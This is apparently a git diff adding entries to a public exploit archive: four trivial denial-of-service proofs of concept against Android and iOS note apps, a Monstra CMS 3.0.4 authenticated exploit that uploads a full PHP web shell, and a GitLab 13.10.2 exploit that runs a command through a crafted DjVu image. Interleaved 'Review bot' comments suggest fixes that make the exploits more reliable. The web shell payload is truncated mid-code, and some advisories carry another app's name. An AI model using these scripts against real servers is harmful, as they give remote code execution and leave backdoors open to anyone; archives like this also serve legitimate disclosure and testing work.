diff --git a/exploits/android/dos/49946.txt b/exploits/android/dos/49946.txt new file mode 100644 index 000000000..6434b7f5c --- /dev/null +++ b/exploits/android/dos/49946.txt @@ -0,0 +1,35 @@ +# Exploit Title: Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC) +# Date: 2021-06-03 +# Author: Brian Rodríguez +# Download Link: https://play.google.com/store/apps/details?id=com.workpail.inkpad.notepad.notes&hl=es_MX +# Version: 4.3.61 +# Category: DoS (Android) + +##### Vulnerability ##### + +InkPad Bloc de notas - Tareas is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against Android 8.0. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 50000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49952.py b/exploits/ios/dos/49952.py new file mode 100755 index 000000000..a131a0ad6 --- /dev/null +++ b/exploits/ios/dos/49952.py 
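Review bot: The bare `except:` at the end of the payload.py listing swallows every exception, including KeyboardInterrupt, and then prints a message that hides the actual cause; catch `except OSError as exc:` and put `exc` in the message, and let a context manager do the closing: `with open("payload.txt", "w") as f:` followed by `    f.write(buffer)`. The header calls the product "Inkpad Notepad & To do list" while the description calls it "InkPad Bloc de notas - Tareas" (the localized store name behind the es_MX link); naming both once, or using the English name throughout, would help readers match this entry to the app. The reproduction is manual (50,000 'A's pasted twice) and the write-up only reports that the app stops working on Android 8.0, so it should be read as an application-level availability bug and nothing in the note supports more than that.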
@@ -0,0 +1,35 @@ +# Exploit Title: Color Notes 1.4 - Denial of Service (PoC) +# Date: 06-04-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/gt/app/color-notes/id830515136 +# Version: 1.4 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: +f = open("payload.txt","w") +f.write(buffer) +f.close() +print ("File created") +except: +print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49953.py b/exploits/ios/dos/49953.py new file mode 100755 index 000000000..6f509fc40 --- /dev/null +++ b/exploits/ios/dos/49953.py 
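Review bot: The lines after `try:` and `except:` in this listing (`+f = open(...)`, `+print (...)`) appear at column 0, unlike the otherwise identical 49953.py and 49954.py in the same commit, so as committed payload.py would stop with IndentationError before writing anything; unless the whitespace was lost in rendering, those four body lines need to be indented. The bare `except:` also masks whatever really went wrong — `except OSError as exc:` with `exc` in the message is enough. Using `with open("payload.txt", "w") as f:` would drop the manual `f.close()` as well. The note reports only that the app stops working after 350,000 characters are pasted twice on iOS 14.2, which the "DoS (PoC)" title reflects correctly; it should not be read as more than that.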
@@ -0,0 +1,35 @@ +# Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC) +# Date: 06-04-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221 +# Version: 5.5 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49954.py b/exploits/ios/dos/49954.py new file mode 100755 index 000000000..94d1838eb --- /dev/null +++ b/exploits/ios/dos/49954.py 
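Review bot: The vulnerability paragraph reads `Color Notes is vulnerable to a DoS condition…` although the title and App Store link of this file are for Macaron Notes 5.5, so the sentence was carried over from 49952.py and should read `Macaron Notes is vulnerable to a DoS condition…`. The payload script catches everything with a bare `except:` and reports only a generic message; `except OSError as exc:` and printing `exc` keeps the failure visible without changing the PoC. A `with open("payload.txt", "w") as f:` block would also remove the explicit `f.close()`. The only trigger given is 350,000 'A's pasted twice and the only observed effect is a crash on iOS 14.2, so the advisory stands as an availability issue and nothing here suggests otherwise.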
@@ -0,0 +1,35 @@ +# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC) +# Date: 06-04-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781 +# Version: 5.3 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/php/webapps/49949.py b/exploits/php/webapps/49949.py new file mode 100755 index 000000000..d92fdb924 --- /dev/null +++ b/exploits/php/webapps/49949.py 
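Review bot: The description names the wrong product — `Color Notes is vulnerable…` in an advisory whose title and link are My Notes Safe 5.3 — and should read `My Notes Safe is vulnerable to a DoS condition…`. Like its siblings in this commit, payload.py uses a bare `except:` that hides the real error; narrowing it to `except OSError as exc:` and opening the file with `with open("payload.txt", "w") as f:` is a small, behaviour-preserving cleanup. It would also help readers to state that the crash was only observed on iOS 14.2 with the 350,000-character buffer pasted twice, since that is the whole of the evidence the note gives.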
@@ -0,0 +1,101 @@ +# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (Authenticated) +# Date: 03.06.2021 +# Exploit Author: Ron Jost (hacker5preme) +# Vendor Homepage: https://monstra.org/ +# Software Link: https://monstra.org/monstra-3.0.4.zip +# Version: 3.0.4 +# Tested on: Ubuntu 20.04 +# CVE: CVE-2018-6383 +# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-6383-Exploit + +''' +Description: +Monstra CMS through 3.0.4 has an incomplete "forbidden types" list that excludes .php (and similar) file extensions +but not the .pht or .phar extension, which allows remote authenticated Admins or Editors to execute arbitrary PHP code + by uploading a file, a different vulnerability than CVE-2017-18048. +''' + + +''' +Import required modules: +''' +import argparse +import requests + + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='Exploit for CVE-2018-6383') +my_parser.add_argument('-T', type=str, help='Target IP') +my_parser.add_argument('-P', type=str, help='Target Port') +my_parser.add_argument("-U", type=str, help="Monstra CMS Path") +my_parser.add_argument('-u', type=str, help="Username") +my_parser.add_argument('-p', type=str, help='Password') +args = my_parser.parse_args() +target_ip = args.T +target_port = args.P +Monstracms_path = args.U +username = args.u +password = args.p + + +''' +Exploit: +''' +# Cookies: +session = requests.Session() +url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php' +cookies = session.get(url).cookies.get_dict() +value = cookies['PHPSESSID'] +cookies = { + "__atuvc": "9%7C22", + 'PHPSESSID': 'sga7s1jb0o3b7dlueh5soin8a9' +} + +# Construct authentication header: +headers = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + 
"Content-Type": "application/x-www-form-urlencoded", + "Origin": "http://" + target_ip, + "Connection": "close", + "Referer": "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php', + "Upgrade-Insecure-Requests": "1"} + +# Construct authentication body +body = { + "login": username, + "password": password, + "login_submit": "Log In"} +x = requests.post(url, headers=headers, cookies=cookies, data=body) + +# Construct Exploit link: +url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php?id=filesmanager' + +# Construct Exploit header: +header = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "multipart/form-data; boundary=---------------------------27822155982314896762160847658", + "Origin": "http://" + target_ip, + "Connection": "close", + "Referer": "http://" + target_ip + Monstracms_path + 'admin/index.php?id=filesmanager', + "Upgrade-Insecure-Requests": "1" +} + +# Construct Exploit data: +burp0_data = "-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"csrf\"\r\n\r\n1e71963993909d612c40962b401c556b70e9bb3c\r\n-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.phar\"\r\nContent-Type: application/octet-stream\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => 
getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n \n \n p0wny@shell:~#\n \n \n\n \n \n\n \n
\n
\n                
\n ___ ____ _ _ _ _ _ \n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| \n|_| |___/ \\____/ \n
\n
\n
\n \n
\n \n
\n
\n
\n \n\n\n\r\n-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"upload_file\"\r\n\r\nUpload\r\n-----------------------------27822155982314896762160847658--\r\n" + +# Exploit: +x = requests.post(url, headers=header, cookies=cookies, data=burp0_data) + +# Finish: +print('') +print('Please login in your webrowser and then open the following URL:') +print('File uploaded to: http://' + target_ip + ':' + target_port + Monstracms_path + 'public/uplaods/shell.phar') +print('') \ No newline at end of file diff --git a/exploits/ruby/webapps/49951.py b/exploits/ruby/webapps/49951.py new file mode 100755 index 000000000..45e2854a3 --- /dev/null +++ b/exploits/ruby/webapps/49951.py 
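Review bot: The session created with `session.get(url)` is thrown away — `value` is never used and `cookies` is immediately replaced by a hard-coded `'PHPSESSID': 'sga7s1jb0o3b7dlueh5soin8a9'` — and both the login and the upload go through module-level `requests.post`, so the upload is authenticated only if the server happens to adopt the attacker-chosen session id. Drop the hard-coded dict and send both requests through the session, `x = session.post(url, headers=headers, data=body)` and `x = session.post(url, headers=header, data=burp0_data)`, and check the login response for success before uploading. The `csrf` field inside `burp0_data` is likewise a fixed value (`1e71963993909d612c40962b401c556b70e9bb3c`); if Monstra ties that token to the session it has to be read from the filesmanager page rather than replayed. The uploaded file is a full web shell whose `feature` dispatcher calls `exec` and `shell_exec` for any caller with no authentication of its own, so the header should warn that it leaves an open backdoor to be removed after testing; the final printed path `public/uplaods/shell.phar` also looks like a typo for `uploads`. The beginning of the PHP payload within `burp0_data` appears truncated in this view (it starts mid-regex), so the shell body itself is not reviewed here.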
@@ -0,0 +1,99 @@ +# Exploit Title: Gitlab 13.10.2 - Remote Code Execution (Authenticated) +# Date: 04/06/2021 +# Exploit Author: enox +# Vendor Homepage: https://about.gitlab.com/ +# Software Link: https://gitlab.com/ +# Version: < 13.10.3 +# Tested On: Ubuntu 20.04 +# Environment: Gitlab 13.10.2 CE +# Credits: https://hackerone.com/reports/1154542 + +import requests +from bs4 import BeautifulSoup +import random +import os +import argparse + +parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE') +parser.add_argument('-u', help='Username', required=True) +parser.add_argument('-p', help='Password', required=True) +parser.add_argument('-c', help='Command', required=True) +parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True) +args = parser.parse_args() + +username = args.u +password = args.p +gitlab_url = args.t +command = args.c + +session = requests.Session() + +# Authenticating +print("[1] Authenticating") +r = session.get(gitlab_url + "/users/sign_in") +soup = BeautifulSoup(r.text, features="lxml") +token = soup.findAll('meta')[16].get("content") + +login_form = { + "authenticity_token": token, + "user[login]": username, + "user[password]": password, + "user[remember_me]": "0" +} +r = session.post(f"{gitlab_url}/users/sign_in", data=login_form) + +if r.status_code != 200: + exit(f"Login Failed:{r.text}") +else: + print("Successfully Authenticated") + + +# payload creation +print("[2] Creating Payload ") + +payload = f"\" . qx{{{command}}} . \\\n" +f1 = open("/tmp/exploit","w") +f1.write('(metadata\n') +f1.write(' (Copyright "\\\n') +f1.write(payload) +f1.write('" b ") )') +f1.close() + +# Checking if djvumake is installed +check = os.popen('which djvumake').read() +if (check == ""): + exit("djvumake not installed. 
Install by running command : sudo apt install djvulibre-bin") + +# Building the payload +os.system('djvumake /tmp/exploit.jpg INFO=0,0 BGjp=/dev/null ANTa=/tmp/exploit') + + +# Uploading it +print("[3] Creating Snippet and Uploading") + +# Getting the CSRF token +r = session.get(gitlab_url + "/users/sign_in") +soup = BeautifulSoup(r.text, features="lxml") +csrf = soup.findAll('meta')[16].get("content") + + +cookies = {'_gitlab_session': session.cookies['_gitlab_session']} +headers = { + 'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);', + 'Accept': 'application/json', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Referer': f'{gitlab_url}/projects', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + 'X-Requested-With': 'XMLHttpRequest', + 'X-CSRF-Token': f'{csrf}' +} +files = {'file': ('exploit.jpg', open('/tmp/exploit.jpg', 'rb'), 'image/jpeg', {'Expires': '0'})} + +r = session.post(gitlab_url+'/uploads/user', files=files, cookies=cookies, headers=headers, verify=False) + +if r.text != "Failed to process image\n": + exit("[-] Exploit failed") +else: + print("[+] RCE Triggered !!") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b72ed94b7..6c6259f25 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
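Review bot: The CSRF token is read by position, `soup.findAll('meta')[16].get("content")`, both at sign-in and again before the upload; any extra `<meta>` in GitLab's head returns a different tag's content and the request then fails with no hint why, so select it by name: `token = soup.find('meta', attrs={'name': 'csrf-token'})['content']`. The login check `if r.status_code != 200` cannot tell a rejected password from a success, since a re-rendered sign-in form is presumably also served with 200 — look for the sign-in form in the response body instead. Success is inferred solely from the server replying exactly `"Failed to process image\n"`, which shows the image hit the vulnerable processing path but not that `command` ran or what it printed; the note should say the output is not captured and that a blind check (a callback or a file touched by the command) is needed to confirm execution. `/tmp/exploit` and `/tmp/exploit.jpg` are fixed, shared paths written via `os.system`, and the `open('/tmp/exploit.jpg', 'rb')` handle is never closed; `tempfile.mkdtemp()`, `shutil.which('djvumake')` in place of `os.popen('which djvumake')`, and a `with` block would tidy this without changing the exploit. `import random` and `verify=False` on a plain-http URL are unused noise.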
@@ -6789,6 +6789,10 @@ id,file,description,date,author,type,platform,port
 49939,exploits/android/dos/49939.py,"ColorNote 4.1.9 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
 49940,exploits/android/dos/49940.py,"Notepad notes 2.6.7 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
 49941,exploits/android/dos/49941.py,"Blacknote 2.2.1 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
+49946,exploits/android/dos/49946.txt,"Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)",2021-06-04,"Brian Rodriguez",dos,android,
+49952,exploits/ios/dos/49952.py,"Color Notes 1.4 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
+49953,exploits/ios/dos/49953.py,"Macaron Notes great notebook 5.5 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
+49954,exploits/ios/dos/49954.py,"My Notes Safe 5.3 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -44107,3 +44111,5 @@ id,file,description,date,author,type,platform,port
 49943,exploits/php/webapps/49943.txt,"FUDForum 3.1.0 - 'author' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,
 49944,exploits/ruby/webapps/49944.py,"Gitlab 13.9.3 - Remote Code Execution (Authenticated)",2021-06-03,enox,webapps,ruby,
 49945,exploits/php/webapps/49945.txt,"4Images 1.8 - 'redirect' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,
+49949,exploits/php/webapps/49949.py,"Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)",2021-06-04,"Ron Jost",webapps,php,
+49951,exploits/ruby/webapps/49951.py,"Gitlab 13.10.2 - Remote Code Execution (Authenticated)",2021-06-04,enox,webapps,ruby,